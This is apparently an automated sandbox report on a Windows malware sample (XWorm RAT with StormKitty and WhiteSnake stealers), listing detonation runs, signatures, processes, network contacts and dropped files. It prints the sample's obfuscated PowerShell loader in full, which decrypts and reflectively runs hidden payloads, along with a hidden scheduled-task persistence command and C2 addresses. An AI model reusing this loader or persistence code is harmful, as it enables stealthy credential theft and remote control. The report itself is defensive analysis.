Malware Analysis Report

2024-09-23 03:18

Sample ID 240703-yr1essxcnd
Target Guestlist.zip
SHA256 09ebaac81c2816aae61095e019924152b15c1504b0f2f6b512c4230b72268bf8
Tags
xworm execution rat trojan gurcu stormkitty xenarmor collection password recovery spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

09ebaac81c2816aae61095e019924152b15c1504b0f2f6b512c4230b72268bf8

Threat Level: Known bad

The file Guestlist.zip was found to be: Known bad.

Malicious Activity Summary

xworm execution rat trojan gurcu stormkitty xenarmor collection password recovery spyware stealer upx

StormKitty payload

Gurcu, WhiteSnake

Detect Xworm Payload

Xworm

XenArmor Suite

StormKitty

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads local data of messenger clients

Executes dropped EXE

Reads WinSCP keys stored on the system

Loads dropped DLL

Reads user/profile data of local email clients

Reads user/profile data of web browsers

UPX packed file

Checks computer location settings

Reads data files stored by FTP clients

ACProtect 1.3x - 1.4x DLL software

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-07-03 20:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-03 20:01

Reported

2024-07-03 20:04

Platform

win7-20240508-en

Max time kernel

122s

Max time network

123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\wild2.bat"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\wild2.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('7wFkEAMgT15IlR12QYdvYeiKFxGbAYX0oQI0LpFbKWU='); $aes_var.IV=[System.Convert]::FromBase64String('bGaT/qQXAZ1jwzjNeDyQCg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FNnBE=New-Object System.IO.MemoryStream(,$param_var); $AJjqG=New-Object System.IO.MemoryStream; $fbver=New-Object System.IO.Compression.GZipStream($FNnBE, [IO.Compression.CompressionMode]::Decompress); $fbver.CopyTo($AJjqG); $fbver.Dispose(); $FNnBE.Dispose(); $AJjqG.Dispose(); $AJjqG.ToArray();}function execute_function($param_var,$param2_var){ $QipFS=[System.Reflection.Assembly]::Load([byte[]]$param_var); $PhiBy=$QipFS.EntryPoint; $PhiBy.Invoke($null, $param2_var);}$VfwJS = 'C:\Users\Admin\AppData\Local\Temp\wild2.bat';$host.UI.RawUI.WindowTitle = $VfwJS;$CtScz=[System.IO.File]::ReadAllText($VfwJS).Split([Environment]::NewLine);foreach ($jbVyw in $CtScz) { if ($jbVyw.StartsWith('lxeWUjbreKgbBVHbyYLg')) { $SrUtu=$jbVyw.Substring(20); break; }}$payloads_var=[string[]]$SrUtu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Network

N/A

Files

memory/1316-4-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

memory/1316-6-0x0000000002810000-0x0000000002818000-memory.dmp

memory/1316-5-0x000000001B540000-0x000000001B822000-memory.dmp

memory/1316-7-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1316-8-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1316-9-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1316-10-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1316-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1316-12-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-03 20:01

Reported

2024-07-03 20:04

Platform

win10v2004-20240508-en

Max time kernel

137s

Max time network

146s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wild2.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wild2.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('7wFkEAMgT15IlR12QYdvYeiKFxGbAYX0oQI0LpFbKWU='); $aes_var.IV=[System.Convert]::FromBase64String('bGaT/qQXAZ1jwzjNeDyQCg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FNnBE=New-Object System.IO.MemoryStream(,$param_var); $AJjqG=New-Object System.IO.MemoryStream; $fbver=New-Object System.IO.Compression.GZipStream($FNnBE, [IO.Compression.CompressionMode]::Decompress); $fbver.CopyTo($AJjqG); $fbver.Dispose(); $FNnBE.Dispose(); $AJjqG.Dispose(); $AJjqG.ToArray();}function execute_function($param_var,$param2_var){ $QipFS=[System.Reflection.Assembly]::Load([byte[]]$param_var); $PhiBy=$QipFS.EntryPoint; $PhiBy.Invoke($null, $param2_var);}$VfwJS = 'C:\Users\Admin\AppData\Local\Temp\wild2.bat';$host.UI.RawUI.WindowTitle = $VfwJS;$CtScz=[System.IO.File]::ReadAllText($VfwJS).Split([Environment]::NewLine);foreach ($jbVyw in $CtScz) { if ($jbVyw.StartsWith('lxeWUjbreKgbBVHbyYLg')) { $SrUtu=$jbVyw.Substring(20); break; }}$payloads_var=[string[]]$SrUtu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\wild2')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.telegram.org udp
US 142.202.242.177:7000 tcp
US 142.202.242.177:7000 tcp
US 142.202.242.177:7000 tcp
US 142.202.242.177:7000 tcp
US 142.202.242.177:7000 tcp

Files

memory/4144-0-0x00007FFC3E9F3000-0x00007FFC3E9F5000-memory.dmp

memory/4144-6-0x0000027205A80000-0x0000027205AA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3ynkswj.5wa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4144-11-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/4144-12-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/4144-13-0x000002721EDF0000-0x000002721EE34000-memory.dmp

memory/4144-14-0x000002721EEC0000-0x000002721EF36000-memory.dmp

memory/2400-24-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/2400-25-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/2400-26-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/2400-29-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/4144-30-0x0000027205AB0000-0x0000027205AB8000-memory.dmp

memory/4144-31-0x000002721E070000-0x000002721E080000-memory.dmp

memory/4144-34-0x000002721E080000-0x000002721E094000-memory.dmp

memory/4144-33-0x00007FFC5B9F0000-0x00007FFC5BAAE000-memory.dmp

memory/4144-32-0x00007FFC5CA70000-0x00007FFC5CC65000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 baebece6c25520221e68055be287f370
SHA1 a3e7232cd44a9c9980da327dcd5124a0889a5486
SHA256 4e97fe0cb5b7c529ae80d3678e9f31fc25c09f0b450f9231d8a472be0d35de07
SHA512 fb57454e55b0a17254f898f52e5106fd82bcf2046c310ed207fa9f2d44526f66ad49335c105947a21c57681f4365707c63809a566f60bad47f745891cb7e9c5d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9d662ecae338ca923a784422a86e9925
SHA1 ccdbbd6f3a1801b13f503d92f5d48fe5041ab495
SHA256 af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e
SHA512 5455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e

memory/4144-58-0x000002721F2A0000-0x000002721F2B6000-memory.dmp

memory/4144-60-0x00007FFC3E9F3000-0x00007FFC3E9F5000-memory.dmp

memory/4144-61-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-03 20:01

Reported

2024-07-03 20:04

Platform

win7-20240508-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wild2.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wild2.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\dropped.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('ugGNW2NnPvk9adSUBcDc96/inp4cdhLsP4c8Xr7rMvA='); $aes_var.IV=[System.Convert]::FromBase64String('GuK3QAh6wjXaE/OXIlyZUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ikyRS=New-Object System.IO.MemoryStream(,$param_var); $tIvxd=New-Object System.IO.MemoryStream; $uIXwv=New-Object System.IO.Compression.GZipStream($ikyRS, [IO.Compression.CompressionMode]::Decompress); $uIXwv.CopyTo($tIvxd); $uIXwv.Dispose(); $ikyRS.Dispose(); $tIvxd.Dispose(); $tIvxd.ToArray();}function execute_function($param_var,$param2_var){ $kiXtP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $zdYbv=$kiXtP.EntryPoint; $zdYbv.Invoke($null, $param2_var);}$dTbxL = 'C:\Users\Admin\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $dTbxL;$cGnsR=[System.IO.File]::ReadAllText($dTbxL).Split([Environment]::NewLine);foreach ($QrlnJ in $cGnsR) { if ($QrlnJ.StartsWith('oJuhxRvpkzgxXdlXhMuO')) { $JHuZc=$QrlnJ.Substring(20); break; }}$payloads_var=[string[]]$JHuZc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\dropped.bat

MD5 e770f53921bca6b9d02faf3e70059249
SHA1 fb04530ec135f2a34afd3bdf0c205193418812b6
SHA256 be7e5d1cccf5602cbe866ce6f342bd960263f3cd08a75d149372af37fa2a50b1
SHA512 f970fab83358451a7cb158d4377defa35188996b1f2005a90e1fe0e747db65424366efcc847c133919395310536348bc795caef3161a21b70b2b0cd16566ec86

memory/2468-6-0x0000000002D30000-0x0000000002DB0000-memory.dmp

memory/2468-7-0x000000001B480000-0x000000001B762000-memory.dmp

memory/2468-8-0x0000000002410000-0x0000000002418000-memory.dmp

memory/2468-9-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-03 20:01

Reported

2024-07-03 20:04

Platform

win10v2004-20240611-en

Max time kernel

136s

Max time network

145s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wild2.vbs"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

XenArmor Suite

recovery password xenarmor

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\All-In-One.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\All-In-One.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Local\Temp\All-In-One.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4612 set thread context of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
